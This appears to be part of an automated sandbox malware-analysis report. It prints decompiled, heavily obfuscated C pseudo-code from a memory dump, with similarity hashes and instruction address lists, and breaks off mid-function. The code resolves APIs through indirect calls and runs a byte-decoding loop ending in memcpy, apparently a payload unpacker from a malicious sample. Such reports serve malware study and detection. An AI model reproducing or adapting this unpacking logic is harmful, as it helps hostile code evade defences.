                  				 *(_t89 + 0x41c8a6) =  *(_t89 + 0x41c8a6) + 1;
                  				_a4 = _a4 + (_t77 + 0x00000001 - 0x00000001 ^ 0x310) + 0xffffffff;
                  				 *(_t89 + 0x41c8a6) =  *(_t89 + 0x41c8a6) | 0x00000316;
                  				return 0xfffffffffffff815;
                  			}


















                  0x03051b1e
                  0x03051b3b
                  0x03051b45
                  0x03051b58
                  0x03051b47
                  0x03051b47
                  0x03051b4b
                  0x03051b4b
                  0x03051b64
                  0x03051b66
                  0x03051b6c
                  0x03051b70
                  0x03051b75
                  0x03051b7e
                  0x03051b89
                  0x03051b90
                  0x03051b9a
                  0x03051b80
                  0x03051b80
                  0x03051b83
                  0x03051b83
                  0x03051b9f
                  0x03051ba8
                  0x03051bb7
                  0x03051bc1
                  0x03051baa
                  0x03051baa
                  0x03051bb0
                  0x03051be4
                  0x03051bfe
                  0x03051c01
                  0x03051c0c
                  0x03051c1c
                  0x03051c29
                  0x03051c3c
                  0x03051c44
                  0x03051c47
                  0x03051c4d
                  0x03051c56
                  0x03051c5e
                  0x03051c74
                  0x03051c91
                  0x03051cb3
                  0x03051ccd

                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.602925893.0000000003050000.00000040.00000001.sdmp, Offset: 03050000, based on PE: true
                  Similarity
                  • API ID:
                  • String ID: M~
                  • API String ID: 0-3014885260
                  • Opcode ID: 12ddc3b1168ff52f07e762c651a63c9af5d943a6ffcb7562eca4daf5dfd61062
                  • Instruction ID: 76576125321bf30b536545837645286bc831db06a4c76938932ea69fb9890240
                  • Opcode Fuzzy Hash: 12ddc3b1168ff52f07e762c651a63c9af5d943a6ffcb7562eca4daf5dfd61062
                  • Instruction Fuzzy Hash: FF41D273810A059FEB04DE7CCCC97CB7A61EF80339F188366AC399A1D9D33886558B58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 85%
                  			E03053A14(signed int __ebx, void* __ecx, signed int __edx, signed int __edi, void* __esi, signed int _a4, intOrPtr _a8) {
                  				signed int _v8;
                  				signed int _v12;
                  				signed int _v16;
                  				signed int _v20;
                  				signed int _v24;
                  				signed int _v28;
                  				signed int _v32;
                  				signed int _v36;
                  				signed int _v40;
                  				signed int _v48;
                  				signed int _t498;
                  				signed int _t503;
                  				void* _t505;
                  				void* _t506;
                  				signed int _t510;
                  				signed int _t513;
                  				signed int _t516;
                  				signed int _t521;
                  				void* _t523;
                  				void* _t525;
                  				intOrPtr _t526;
                  				void _t529;
                  				signed int _t533;
                  				intOrPtr _t539;
                  				signed int _t544;
                  				signed int _t546;
                  				signed int _t551;
                  				signed int _t554;
                  				void* _t556;
                  				signed int _t557;
                  				void* _t560;
                  				signed int _t565;
                  				signed int _t566;
                  				signed int _t569;
                  				void* _t573;
                  				void* _t575;
                  				signed int _t576;
                  				signed int _t579;
                  				intOrPtr _t581;
                  				signed int _t587;
                  				signed int _t589;
                  				void* _t592;
                  				void* _t594;
                  				signed int _t595;
                  				void* _t599;
                  				void* _t601;
                  				intOrPtr _t602;
                  				void* _t605;
                  				void* _t607;
                  				void* _t608;
                  				signed int _t613;
                  				signed int _t614;
                  				void* _t616;
                  				void* _t618;
                  				signed int _t623;
                  				void* _t625;
                  				signed int _t626;
                  				signed int _t629;
                  				signed int _t637;
                  				void* _t639;
                  				void* _t641;
                  				void* _t642;
                  				signed int _t645;
                  				signed int _t648;
                  				signed int _t660;
                  				signed int _t663;
                  				signed int _t665;
                  				signed int _t672;
                  				signed int _t675;
                  				signed int _t677;
                  				signed int _t679;
                  				signed int _t682;
                  				void* _t685;
                  				signed int _t692;
                  				signed int _t693;
                  				signed int _t702;
                  				signed int _t704;
                  				signed int _t706;
                  				signed int _t708;
                  				signed int _t712;
                  				signed int _t714;
                  				signed int _t717;
                  				signed int _t720;
                  				void* _t723;
                  				signed int _t725;
                  				signed int _t727;
                  				signed int _t730;
                  				signed int _t731;
                  				signed int _t733;
                  				signed int _t740;
                  				signed int _t741;
                  				signed int _t746;
                  				signed int _t749;
                  				signed int _t751;
                  				signed int _t753;
                  				signed int _t755;
                  				signed int _t758;
                  				signed int _t761;
                  				signed int _t765;
                  				signed int _t769;
                  				signed int _t774;
                  				signed int _t779;
                  				signed int _t784;
                  				signed int _t787;
                  				signed int _t790;
                  				signed int _t792;
                  				signed int _t795;
                  				signed int _t798;
                  				void* _t803;
                  				void* _t810;
                  				signed int _t812;
                  				signed int _t815;
                  				signed int _t820;
                  				signed int _t823;
                  				signed int _t825;
                  				signed int _t828;
                  				signed int _t834;
                  				signed int _t839;
                  				void* _t840;
                  				signed int _t844;
                  				signed int _t849;
                  				void* _t851;
                  				signed int _t853;
                  				signed int _t856;
                  				signed int _t859;
                  				signed int _t863;
                  				signed int _t864;
                  				signed int _t867;
                  				signed int _t871;
                  				signed int _t874;
                  				signed int _t878;
                  				signed int* _t879;
                  				signed int* _t880;
                  				signed int* _t881;
                  				signed int* _t882;
                  				signed int* _t883;
                  				signed int* _t884;
                  				signed int* _t885;
                  				signed int* _t889;
                  				signed int* _t890;
                  				signed int* _t891;
                  				signed int* _t892;
                  				signed int* _t893;
                  				signed int* _t894;
                  				signed int* _t895;
                  				signed int* _t896;
                  				signed int* _t897;
                  				signed int* _t898;
                  				signed int* _t899;
                  				signed int* _t900;
                  
                  				_t740 = __edx;
                  				_t660 = __ebx;
                  				_push(__edi);
                  				 *_t878 =  *_t878 ^ __edi;
                  				 *_t878 =  *_t878 | _t863;
                  				_t864 = _t878;
                  				_t879 = _t878 + 0xffffffdc;
                  				_push(__edi);
                  				 *_t879 =  *_t879 ^ __edi;
                  				 *_t879 =  *_t879 | __ebx;
                  				_push(_a8);
                  				_pop( *_t2);
                  				_push(_v40);
                  				_pop(_t792);
                  				_t675 = _v48;
                  				_v48 =  *((intOrPtr*)(_t792 + 0xc));
                  				_pop( *_t6);
                  				_v48 =  *((intOrPtr*)(_t792 + 4));
                  				_pop(_t834);
                  				 *_t9 = _t864;
                  				if(_v20 == 1) {
                  					_v12 = 7;
                  					_v16 = 1;
                  					_v28 = 8;
                  				}
                  				if(_v20 != 0) {
                  					if(_v20 != 2) {
                  						if(_v20 == 4) {
                  							_t312 = _t660 + 0x41d1be; // 0x41d1be
                  							_v48 = _t312;
                  							_t314 = _t660 + 0x41c0a8; // 0x41c0a8
                  							 *_t879 =  *_t879 & 0x00000000;
                  							 *_t879 =  *_t879 ^ _t314;
                  							_push( *((intOrPtr*)(_t660 + 0x41f068))(_t834, _v40));
                  							_pop( *_t316);
                  							_push(_v36);
                  							_pop( *_t318);
                  							_v12 = 1;
                  							_t320 = _t660 + 0x41c6f8; // 0x41c6f8
                  							_v36 = _v36 & 0x00000000;
                  							 *_t879 =  *_t879 ^ _t320;
                  							_t544 =  *((intOrPtr*)(_t660 + 0x41f060))(_v36);
                  							_v36 = _t740;
                  							 *(_t660 + 0x41c674) =  *(_t660 + 0x41c674) & 0x00000000;
                  							 *(_t660 + 0x41c674) =  *(_t660 + 0x41c674) | _t740 ^ _v36 | _t544;
                  							_t769 = _v36;
                  							_v16 = 0x55;
                  							_t333 = _t660 + 0x41c356; // 0x41c356
                  							_v32 = _v32 & 0x00000000;
                  							 *_t879 =  *_t879 | _t333;
                  							_t546 =  *((intOrPtr*)(_t660 + 0x41f060))(_v32);
                  							_v40 = _t792;
                  							 *(_t660 + 0x41cd7d) =  *(_t660 + 0x41cd7d) & 0x00000000;
                  							 *(_t660 + 0x41cd7d) =  *(_t660 + 0x41cd7d) | _t792 & 0x00000000 ^ _t546;
                  							_t792 = _v40;
                  							_v28 = 2;
                  							_t345 = _t660 + 0x41cc3e; // 0x41cc3e
                  							_v40 = _v40 & 0x00000000;
                  							 *_t879 =  *_t879 ^ _t345;
                  							_t349 = _t660 + 0x41cf5b; // 0x41cf5b
                  							 *_t879 =  *_t879 ^ _t834;
                  							 *_t879 = _t349;
                  							_t498 =  *((intOrPtr*)(_t660 + 0x41f068))(_t834, _v40);
                  							_v36 = _t769;
                  							 *(_t660 + 0x41c1cd) =  *(_t660 + 0x41c1cd) & 0x00000000;
                  							 *(_t660 + 0x41c1cd) =  *(_t660 + 0x41c1cd) | _t769 & 0x00000000 | _t498;
                  							_t740 = _v36;
                  						}
                  					} else {
                  						_t221 = _t660 + 0x41cb7a; // 0x41cb7a
                  						_v32 = 0;
                  						_v48 = _v48 + _t221;
                  						_t224 = _t660 + 0x41c8ec; // 0x41c8ec
                  						_v40 = 0;
                  						 *_t879 =  *_t879 ^ _t224;
                  						_t551 =  *((intOrPtr*)(_t660 + 0x41f068))(_v40, _v32);
                  						 *(_t660 + 0x41c6f4) =  *(_t660 + 0x41c6f4) & 0x00000000;
                  						 *(_t660 + 0x41c6f4) =  *(_t660 + 0x41c6f4) ^ (_t834 & 0x00000000 | _t551);
                  						_t844 = _t834;
                  						_t232 = _t660 + 0x41c379; // 0x41c379
                  						_v36 = _v36 & 0x00000000;
                  						 *_t879 =  *_t879 + _t232;
                  						_t236 = _t660 + 0x41c532; // 0x41c532
                  						_v36 = _v36 & 0x00000000;
                  						 *_t879 =  *_t879 | _t236;
                  						_t554 =  *((intOrPtr*)(_t660 + 0x41f060))(_v36, _v36);
                  						 *_t879 = _t554;
                  						_t242 = _t660 + 0x41d201; // 0x41d201
                  						 *_t879 = _t242;
                  						_t556 =  *((intOrPtr*)(_t660 + 0x41f060))(_v36, _v40);
                  						_t702 = _t675 & 0x00000000 |  *_t879;
                  						_t889 =  &(_t879[1]);
                  						 *_t889 =  *_t889 + _t792;
                  						_t810 = _t556;
                  						_t557 = _t810 + _t702;
                  						_t812 = 0;
                  						_t704 = _t702 & 0x00000000 ^ (_t557 ^  *_t889 |  *(_t660 + 0x41cc21));
                  						_t560 = _t557;
                  						if(_t704 > _t560) {
                  							_t246 = _t660 + 0x41c532; // 0x41c532
                  							 *_t889 =  *_t889 & 0x00000000;
                  							 *_t889 =  *_t889 | _t246;
                  							_t247 = _t660 + 0x41d201; // 0x41d201
                  							_v40 = _v40 & 0x00000000;
                  							 *_t889 =  *_t889 | _t247;
                  							_t587 =  *((intOrPtr*)(_t660 + 0x41f064))(_v40, _t740);
                  							 *(_t660 + 0x41d32e) =  *(_t660 + 0x41d32e) & 0x00000000;
                  							 *(_t660 + 0x41d32e) =  *(_t660 + 0x41d32e) | _t864 -  *_t889 ^ _t587;
                  							_t864 = _t864;
                  						}
                  						_t890 = _t889 - 0xfffffffc;
                  						 *_t890 =  *_t890 & 0x00000000;
                  						 *_t890 =  *_t890 |  *_t889;
                  						_t256 = _t660 + 0x41d01d; // 0x41d01d
                  						 *_t890 =  *_t890 ^ _t812;
                  						 *_t890 =  *_t890 | _t256;
                  						_t257 = _t660 + 0x41c37d; // 0x41c37d
                  						 *_t890 = _t257;
                  						_t565 =  *((intOrPtr*)(_t660 + 0x41f068))(_v32, _t812, _t740);
                  						_v36 = _t812;
                  						 *(_t660 + 0x41c9dc) =  *(_t660 + 0x41c9dc) & 0x00000000;
                  						 *(_t660 + 0x41c9dc) =  *(_t660 + 0x41c9dc) | _t812 & 0x00000000 | _t565;
                  						_t815 = _v36;
                  						_t566 =  *((intOrPtr*)(_t660 + 0x41f060))();
                  						 *_t890 =  *_t890 ^ _t844;
                  						 *_t890 =  *_t890 | _t566;
                  						_t267 = _t660 + 0x41c8c2; // 0x41c8c2
                  						 *_t890 =  *_t890 - _t660;
                  						 *_t890 =  *_t890 + _t267;
                  						_t268 = _t660 + 0x41c737; // 0x41c737
                  						 *_t890 =  *_t890 & 0x00000000;
                  						 *_t890 =  *_t890 ^ _t268;
                  						_t569 =  *((intOrPtr*)(_t660 + 0x41f068))(_t815, _t660, _t844);
                  						 *_t270 = _t569;
                  						_push(_v36);
                  						_pop( *_t272);
                  						_t891 = _t890 - 0xfffffffc;
                  						_v36 = _t815;
                  						 *(_t660 + 0x41c606) = _t569 & 0x00000000 |  *_t890;
                  						_t792 = _v36;
                  						_v12 = 3;
                  						_t277 = _t660 + 0x41d2fe; // 0x41d2fe
                  						_v32 = 0;
                  						 *_t891 =  *_t891 | _t277;
                  						_t573 =  *((intOrPtr*)(_t660 + 0x41f060))(_v32);
                  						 *_t891 =  *_t891 ^ _t792;
                  						 *_t891 =  *_t891 + _t573;
                  						_t281 = _t660 + 0x41d22a; // 0x41d22a
                  						_v40 = _v40 & 0x00000000;
                  						 *_t891 =  *_t891 | _t281;
                  						_t575 =  *((intOrPtr*)(_t660 + 0x41f060))(_v40, _t792);
                  						_t706 = _t704 & 0x00000000 |  *_t891;
                  						_t879 =  &(_t891[1]);
                  						_v40 = _t740;
                  						_push(_t706 + _t575);
                  						_t774 = _v40;
                  						_pop(_t576);
                  						_v36 = _t576;
                  						_t708 = _t706 & 0x00000000 ^ (_t576 ^ _v36 |  *(_t660 + 0x41c48f));
                  						_t579 = _v36;
                  						if(_t708 > _t579) {
                  							_t292 = _t660 + 0x41d2fe; // 0x41d2fe
                  							_v40 = _v40 & 0x00000000;
                  							 *_t879 =  *_t879 + _t292;
                  							_t296 = _t660 + 0x41d22a; // 0x41d22a
                  							_v36 = 0;
                  							 *_t879 =  *_t879 ^ _t296;
                  							_t579 =  *((intOrPtr*)(_t660 + 0x41f064))(_v36, _v40);
                  						}
                  						 *_t879 = _t844;
                  						 *(_t660 + 0x41c2cf) = 0 ^ _t579;
                  						_t834 = 0;
                  						_v16 = 0x11;
                  						_t302 = _t660 + 0x41d09f; // 0x41d09f
                  						 *_t879 =  *_t879 - _t792;
                  						 *_t879 =  *_t879 + _t302;
                  						_t581 =  *((intOrPtr*)(_t660 + 0x41f060))(_t792);
                  						_v40 = _t708;
                  						 *((intOrPtr*)(_t660 + 0x41ce4e)) = _t581;
                  						_t675 = _v40;
                  						_v28 = 4;
                  						_t308 = _t660 + 0x41c4f7; // 0x41c4f7
                  						 *_t879 =  *_t879 ^ _t675;
                  						 *_t879 =  *_t879 + _t308;
                  						_t498 =  *((intOrPtr*)(_t660 + 0x41f060))(_t675);
                  						 *_t879 = _t774;
                  						 *(_t660 + 0x41c895) = 0 ^ _t498;
                  						_t740 = 0;
                  					}
                  					_t741 = _t740 ^ _t740;
                  					_v48 = _v48 - _t792;
                  					_v48 = _t741;
                  					_t357 = _t660 + 0x41c61d; // 0x41c61d
                  					 *_t879 =  *_t879 ^ _t834;
                  					 *_t879 = _t357;
                  					_t503 =  *((intOrPtr*)(_t660 + 0x41f060))(_t834, _t792, _t498);
                  					 *_t879 = _t503;
                  					_t360 = _t660 + 0x41cf67; // 0x41cf67
                  					_v40 = 0;
                  					 *_t879 =  *_t879 ^ _t360;
                  					_t505 =  *((intOrPtr*)(_t660 + 0x41f060))(_v40, _v32);
                  					_pop( *_t364);
                  					_t677 = _t675 & 0x00000000 ^ _v40;
                  					_v40 = _t792;
                  					_push(_t677 + _t505);
                  					_t795 = _v40;
                  					_pop(_t506);
                  					_t679 = _t677 & 0x00000000 | _t864 & 0x00000000 ^  *(_t660 + 0x41c5dc);
                  					_t867 = _t864;
                  					if(_t679 > _t506) {
                  						_t369 = _t660 + 0x41c61d; // 0x41c61d
                  						_v32 = 0;
                  						 *_t879 =  *_t879 ^ _t369;
                  						_t372 = _t660 + 0x41cf67; // 0x41cf67
                  						_v36 = 0;
                  						 *_t879 =  *_t879 | _t372;
                  						_t539 =  *((intOrPtr*)(_t660 + 0x41f064))(_v36, _v32);
                  						_v32 = _t679;
                  						 *((intOrPtr*)(_t660 + 0x41cf4f)) = _t539;
                  						_t679 = _v32;
                  					}
                  					_t880 =  &(_t879[1]);
                  					 *_t880 = _t679;
                  					_t682 = 0;
                  					 *_t880 = _t741 & 0x00000000 |  *_t879;
                  					_t381 = _t660 + 0x41cef6; // 0x41cef6
                  					_v32 = _v32 & 0x00000000;
                  					 *_t880 =  *_t880 | _t381;
                  					_t385 = _t660 + 0x41ceb9; // 0x41ceb9
                  					 *_t880 =  *_t880 ^ _t867;
                  					 *_t880 =  *_t880 ^ _t385;
                  					_t510 =  *((intOrPtr*)(_t660 + 0x41f068))(_t867, _v32, _v40);
                  					 *(_t660 + 0x41caf5) =  *(_t660 + 0x41caf5) & 0x00000000;
                  					 *(_t660 + 0x41caf5) =  *(_t660 + 0x41caf5) | _t682 ^  *_t880 | _t510;
                  					_t685 = _t682;
                  					_t881 = _t880 - 0xfffffffc;
                  					_t746 = _t510 % _v28;
                  					 *_t881 =  *_t881 & 0x00000000;
                  					 *_t881 =  *_t881 | _t746;
                  					_t397 = _t660 + 0x41c52d; // 0x41c52d
                  					_v40 = 0;
                  					 *_t881 =  *_t881 ^ _t397;
                  					_t513 =  *((intOrPtr*)(_t660 + 0x41f060))(_v40, _t685);
                  					 *(_t660 + 0x41d106) =  *(_t660 + 0x41d106) & 0x00000000;
                  					 *(_t660 + 0x41d106) =  *(_t660 + 0x41d106) | _t746 & 0x00000000 | _t513;
                  					_t749 = _t746;
                  					_t751 = _t749 & 0x00000000 ^  *_t881;
                  					_t882 = _t881 - 0xfffffffc;
                  					_v8 = _v8 - _t751;
                  					_v40 = 0;
                  					 *_t882 =  *_t882 | _t751;
                  					_t409 = _t660 + 0x41c7ee; // 0x41c7ee
                  					 *_t882 =  *_t882 ^ _t795;
                  					 *_t882 =  *_t882 ^ _t409;
                  					_t410 = _t660 + 0x41c513; // 0x41c513
                  					_v36 = 0;
                  					 *_t882 =  *_t882 | _t410;
                  					_t516 =  *((intOrPtr*)(_t660 + 0x41f068))(_v36, _t795, _v40, _t685);
                  					_v36 = _t834;
                  					 *(_t660 + 0x41c2a8) =  *(_t660 + 0x41c2a8) & 0x00000000;
                  					 *(_t660 + 0x41c2a8) =  *(_t660 + 0x41c2a8) ^ _t834 & 0x00000000 ^ _t516;
                  					_t753 =  *_t882;
                  					_t883 =  &(_t882[1]);
                  					_v32 = _t516;
                  					_v24 = _v24 & 0x00000000;
                  					_v24 = _v24 | _t516 ^ _v32 ^ _t753;
                  					_t427 = _t660 + 0x41ccc7; // 0x41ccc7
                  					_v40 = 0;
                  					 *_t883 =  *_t883 | _t427;
                  					_t521 =  *((intOrPtr*)(_t660 + 0x41f060))(_v40);
                  					 *(_t660 + 0x41cca4) =  *(_t660 + 0x41cca4) & 0x00000000;
                  					 *(_t660 + 0x41cca4) =  *(_t660 + 0x41cca4) | _t795 -  *_t883 | _t521;
                  					_t798 = _t795;
                  					_t839 = _v36 & 0x00000000 ^ _t660 & 0x00000000 ^ _a4;
                  					_t663 = _t660;
                  					_t436 = _t663 + 0x41c550; // 0x41c550
                  					_v36 = 0;
                  					 *_t883 =  *_t883 + _t436;
                  					_t523 =  *((intOrPtr*)(_t663 + 0x41f060))(_v36);
                  					_v36 = 0;
                  					 *_t883 =  *_t883 + _t523;
                  					_t442 = _t663 + 0x41d34c; // 0x41d34c
                  					 *_t883 = _t442;
                  					_t525 =  *((intOrPtr*)(_t663 + 0x41f060))(_v36, _v36);
                  					_t884 = _t883 - 0xfffffffc;
                  					 *_t445 = _t525;
                  					_v40 = _v40 + (0 ^  *_t883);
                  					_push(_v40);
                  					_pop(_t526);
                  					_t755 = _t753;
                  					_v32 = _t755;
                  					_t758 = _v32;
                  					if( *((intOrPtr*)(_t663 + 0x41ccf8)) > _t526) {
                  						_t452 = _t663 + 0x41c550; // 0x41c550
                  						_v32 = _v32 & 0x00000000;
                  						 *_t884 =  *_t884 + _t452;
                  						_t456 = _t663 + 0x41d34c; // 0x41d34c
                  						_v32 = _v32 & 0x00000000;
                  						 *_t884 =  *_t884 + _t456;
                  						_t526 =  *((intOrPtr*)(_t663 + 0x41f064))(_v32, _v32);
                  					}
                  					_v40 = _t758;
                  					 *((intOrPtr*)(_t663 + 0x41ce46)) = _t526;
                  					_t761 = _v40;
                  					_v32 = _t761;
                  					_t466 = _t663 + 0x41cb9d; // 0x41cb9d
                  					 *_t884 =  *_t884 - _t839;
                  					 *_t884 =  *_t884 | _t466;
                  					_t467 = _t663 + 0x41cd17; // 0x41cd17
                  					_v36 = _v36 & 0x00000000;
                  					 *_t884 =  *_t884 | _t467;
                  					_t529 =  *((intOrPtr*)(_t663 + 0x41f068))(_v36, _t839);
                  					 *_t884 = _t798 & 0x00000000 | _t761 & 0x00000000 ^ _t839;
                  					 *(_t663 + 0x41d015) = 0 ^ _t529;
                  					_t803 = 0;
                  					_t840 = _t839 - 1;
                  					_v32 = 0;
                  					_push(_v32);
                  					 *_t884 =  *_t884 | _t663;
                  					do {
                  						 *_t475 = _t803;
                  						_push(_v36);
                  						_pop(_t692);
                  						_t693 = _t692 & _v12;
                  						if(_t693 == 0) {
                  							_t840 = _t840 + 1;
                  							_t529 = _t529 & 0x00000000 ^ (_t803 -  *_t884 | _v28);
                  							_t803 = _t803;
                  							_t663 =  *(_t529 + _t840) & 0x000000ff;
                  						}
                  						_push(_v16);
                  						_pop( *_t481);
                  						_push(_v36);
                  						_pop(_t765);
                  						asm("rol edx, cl");
                  						asm("lodsb");
                  						_t529 = _t529 | _t765 & _t663;
                  						 *_t803 = _t529;
                  						_t803 = _t803 + 1;
                  						_t483 =  &_v8;
                  						 *_t483 = _v8 - 1;
                  					} while ( *_t483 != 0);
                  					_t665 =  *_t884;
                  					_t885 =  &(_t884[1]);
                  					_t485 = _t665 + 0x41cc0b; // 0x41cc0b
                  					 *_t885 =  *_t885 & 0x00000000;
                  					 *_t885 =  *_t885 ^ _t485;
                  					_t486 = _t665 + 0x41cbd0; // 0x41cbd0
                  					 *_t885 =  *_t885 & 0x00000000;
                  					 *_t885 =  *_t885 | _t486;
                  					_t533 =  *((intOrPtr*)(_t665 + 0x41f068))(_t867, _t693);
                  					_v36 = _t693;
                  					 *(_t665 + 0x41d326) =  *(_t665 + 0x41d326) & 0x00000000;
                  					 *(_t665 + 0x41d326) =  *(_t665 + 0x41d326) ^ (_t693 ^ _v36 | _t533);
                  					_v32 = _t665;
                  					return memcpy(_t803, _t840 + 1, _v24);
                  				} else {
                  					_pop( *_t15);
                  					_t672 = _t660 & 0x00000000 ^ _v32;
                  					_t17 = _t672 + 0x41cb24; // 0x41cb24
                  					_v32 = 0;
                  					 *_t879 =  *_t879 | _t17;
                  					_t589 =  *((intOrPtr*)(_t672 + 0x41f060))(_v32);
                  					 *(_t672 + 0x41c76e) =  *(_t672 + 0x41c76e) & 0x00000000;
                  					 *(_t672 + 0x41c76e) =  *(_t672 + 0x41c76e) ^ _t792 ^ _v48 ^ _t589;
                  					_t820 = _t792;
                  					_t25 = _t672 + 0x41c2ba; // 0x41c2ba
                  					_v48 = _v48 ^ _t820;
                  					_v48 = _t25;
                  					_t26 = _t672 + 0x41d1a6; // 0x41d1a6
                  					 *_t879 =  *_t879 ^ _t820;
                  					 *_t879 =  *_t879 + _t26;
                  					_t592 =  *((intOrPtr*)(_t672 + 0x41f060))(_t820, _t820);
                  					 *_t879 =  *_t879 - _t864;
                  					 *_t879 =  *_t879 + _t592;
                  					_t28 = _t672 + 0x41c035; // 0x41c035
                  					 *_t879 =  *_t879 & 0x00000000;
                  					 *_t879 =  *_t879 | _t28;
                  					_t594 =  *((intOrPtr*)(_t672 + 0x41f060))(_t740, _t864);
                  					_t712 =  *_t879;
                  					_t892 =  &(_t879[1]);
                  					_v40 = _t820;
                  					_push(_t712 + _t594);
                  					_t823 = _v40;
                  					_pop(_t595);
                  					_v40 = _t834;
                  					_t714 = _t712 & 0x00000000 ^ _t834 & 0x00000000 ^  *(_t672 + 0x41c8ae);
                  					_t849 = _v40;
                  					if(_t714 > _t595) {
                  						_t35 = _t672 + 0x41d1a6; // 0x41d1a6
                  						 *_t892 =  *_t892 & 0x00000000;
                  						 *_t892 =  *_t892 ^ _t35;
                  						_t36 = _t672 + 0x41c035; // 0x41c035
                  						 *_t892 = _t36;
                  						_t595 =  *((intOrPtr*)(_t672 + 0x41f064))(_v40, _t672);
                  						_push(0);
                  						 *_t892 = _t714;
                  						 *(_t672 + 0x41d244) = 0 ^ _t595;
                  					}
                  					_t893 = _t892 - 0xfffffffc;
                  					 *_t893 =  *_t893 - _t849;
                  					 *_t893 =  *_t893 ^ (_t595 & 0x00000000 |  *_t892);
                  					_t40 = _t672 + 0x41cd30; // 0x41cd30
                  					 *_t893 =  *_t893 ^ _t849;
                  					 *_t893 =  *_t893 + _t40;
                  					_t599 =  *((intOrPtr*)(_t672 + 0x41f060))(_t849, _t849);
                  					_v36 = 0;
                  					 *_t893 =  *_t893 + _t599;
                  					_t44 = _t672 + 0x41c116; // 0x41c116
                  					 *_t893 = _t44;
                  					_t601 =  *((intOrPtr*)(_t672 + 0x41f060))(_v40, _v36);
                  					_t894 =  &(_t893[1]);
                  					 *_t47 = _t601;
                  					_v40 = _v40 + (0 ^  *_t893);
                  					_push(_v40);
                  					_pop(_t602);
                  					_t851 = _t849;
                  					_v40 = _t740;
                  					_t717 = 0 ^  *(_t672 + 0x41d282);
                  					_t779 = _v40;
                  					if(_t717 > _t602) {
                  						_t54 = _t672 + 0x41cd30; // 0x41cd30
                  						_v36 = _v36 & 0x00000000;
                  						 *_t894 =  *_t894 + _t54;
                  						_t58 = _t672 + 0x41c116; // 0x41c116
                  						 *_t894 = _t58;
                  						_t602 =  *((intOrPtr*)(_t672 + 0x41f064))(_v36, _v36);
                  					}
                  					_v32 = _t779;
                  					 *((intOrPtr*)(_t672 + 0x41d2af)) = _t602;
                  					_t64 = _t672 + 0x41c00f; // 0x41c00f
                  					_v36 = 0;
                  					 *_t894 =  *_t894 | _t64;
                  					_t67 = _t672 + 0x41c17e; // 0x41c17e
                  					_v40 = _v40 & 0x00000000;
                  					 *_t894 =  *_t894 | _t67;
                  					_t605 =  *((intOrPtr*)(_t672 + 0x41f060))(_v40, _v36);
                  					_v40 = 0;
                  					 *_t894 =  *_t894 + _t605;
                  					_t74 = _t672 + 0x41cf79; // 0x41cf79
                  					 *_t894 =  *_t894 & 0x00000000;
                  					 *_t894 =  *_t894 | _t74;
                  					_t607 =  *((intOrPtr*)(_t672 + 0x41f060))(_v40);
                  					 *_t76 = _t717;
                  					_push(_v32);
                  					 *_t78 = _t607;
                  					_v32 = _v32 + (_t717 & 0x00000000) + _v40;
                  					_push(_v32);
                  					_pop(_t608);
                  					_pop(_t784);
                  					_push( *((intOrPtr*)(_t672 + 0x41cc9b)));
                  					_pop( *_t83);
                  					_push(_v40);
                  					_pop(_t720);
                  					if(_t720 > _t608) {
                  						_t85 = _t672 + 0x41c17e; // 0x41c17e
                  						 *_t894 =  *_t894 & 0x00000000;
                  						 *_t894 =  *_t894 + _t85;
                  						_t86 = _t672 + 0x41cf79; // 0x41cf79
                  						_v32 = _v32 & 0x00000000;
                  						 *_t894 =  *_t894 ^ _t86;
                  						_push( *((intOrPtr*)(_t672 + 0x41f064))(_v32, _t784));
                  						_pop( *_t91);
                  						_push(_v40);
                  						_pop( *_t93);
                  					}
                  					_t895 =  &(_t894[1]);
                  					 *_t895 =  *_t894;
                  					_t95 = _t672 + 0x41cd11; // 0x41cd11
                  					 *_t895 =  *_t895 & 0x00000000;
                  					 *_t895 =  *_t895 + _t95;
                  					_t96 = _t672 + 0x41c5be; // 0x41c5be
                  					_v40 = _v40 & 0x00000000;
                  					 *_t895 =  *_t895 ^ _t96;
                  					_t613 =  *((intOrPtr*)(_t672 + 0x41f068))(_v40, _t864, _v36);
                  					 *(_t672 + 0x41caaa) =  *(_t672 + 0x41caaa) & 0x00000000;
                  					 *(_t672 + 0x41caaa) =  *(_t672 + 0x41caaa) ^ (_t720 & 0x00000000 | _t613);
                  					_t723 = _t720;
                  					_t614 =  *((intOrPtr*)(_t672 + 0x41f068))();
                  					 *_t895 =  *_t895 & 0x00000000;
                  					 *_t895 =  *_t895 ^ _t614;
                  					_t106 = _t672 + 0x41d112; // 0x41d112
                  					_v36 = 0;
                  					 *_t895 =  *_t895 + _t106;
                  					_t616 =  *((intOrPtr*)(_t672 + 0x41f060))(_v36, _t823);
                  					 *_t895 =  *_t895 - _t723;
                  					 *_t895 =  *_t895 + _t616;
                  					_t110 = _t672 + 0x41c899; // 0x41c899
                  					_v40 = 0;
                  					 *_t895 =  *_t895 | _t110;
                  					_t618 =  *((intOrPtr*)(_t672 + 0x41f060))(_v40, _t723);
                  					_t725 =  *_t895;
                  					_t896 =  &(_t895[1]);
                  					 *_t114 = _t618;
                  					_v36 = _v36 + _t725;
                  					_push(_v36);
                  					_pop(_t619);
                  					_t853 = _t851;
                  					_v32 = _t784;
                  					_t727 = _t725 & 0x00000000 | _t784 - _v32 ^  *(_t672 + 0x41c8e8);
                  					_t787 = _v32;
                  					if(_t727 > _t619) {
                  						_t122 = _t672 + 0x41d112; // 0x41d112
                  						_v40 = _v40 & 0x00000000;
                  						 *_t896 =  *_t896 ^ _t122;
                  						_t126 = _t672 + 0x41c899; // 0x41c899
                  						 *_t896 =  *_t896 - _t672;
                  						 *_t896 =  *_t896 | _t126;
                  						_push( *((intOrPtr*)(_t672 + 0x41f064))(_t672, _v40));
                  						_pop( *_t128);
                  						_push(_v40);
                  						_pop( *_t130);
                  					}
                  					_t897 =  &(_t896[1]);
                  					 *(_t672 + 0x41d0d6) =  *(_t672 + 0x41d0d6) & 0x00000000;
                  					 *(_t672 + 0x41d0d6) =  *(_t672 + 0x41d0d6) ^ _t853 ^  *_t897 ^  *_t896;
                  					_t856 = _t853;
                  					_t135 = _t672 + 0x41cc19; // 0x41cc19
                  					 *_t897 = _t135;
                  					_t623 =  *((intOrPtr*)(_t672 + 0x41f060))(_v36);
                  					_v32 = _v32 & 0x00000000;
                  					 *_t897 =  *_t897 ^ _t623;
                  					_t141 = _t672 + 0x41c058; // 0x41c058
                  					_v32 = 0;
                  					 *_t897 =  *_t897 + _t141;
                  					_t625 =  *((intOrPtr*)(_t672 + 0x41f060))(_v32, _v32);
